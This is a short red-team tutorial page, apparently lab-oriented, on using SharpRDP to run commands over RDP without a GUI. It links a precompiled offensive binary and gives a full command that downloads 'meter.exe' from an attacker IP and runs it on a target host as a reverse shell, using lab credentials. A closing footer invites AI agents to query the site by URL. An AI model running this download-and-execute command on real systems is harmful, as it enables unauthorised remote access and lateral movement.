# RDP as a Console

Although RDP is most often associated with the mstsc GUI client, it can also be used as a command-line tool. This technique reduces our overhead while still relying on the RDP protocol, which will often blend in well with typical network traffic.

The RDP application (mstsc.exe) builds upon the terminal services library mstscax.dll. This library exposes interfaces to both scripts and compiled code through COM objects.

SharpRDP is a C# application that uses uses the non-scriptable interfaces exposed by mstscax.dll to perform authentication in the same way as mstsc.exe.

Once authentication is performed, SharpRDP allows us to execute code through SendKeys. In this manner, no GUI access is required and setting up a reverse tunnel is unnecessary.

To demonstrate this, we’ll use the pre-compiled version of SharpRDP. We’ll specify the computername, username, and password along with the command to be executed. In this example, we’ll simply execute a reverse TCP shell using powershell:

{% embed url="<https://github.com/sartlabs/OffensiveTools/blob/main/SharpRDP.exe>" %}
*SharpRDP.exe*
{% endembed %}

{% code overflow="wrap" %}

```powershell
sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.69/meter.exe','C:\Windows\Tasks\meter.exe'); C:\Windows\Tasks\meter.exe" username=corp1\dave password=lab
```

{% endcode %}

<figure><img src="/files/tjKc5eBoxqAi659VVoko" alt=""><figcaption><p><em>RDP taken using SharpRDP</em></p></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.redteamgarage.com/rdp-as-a-console.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.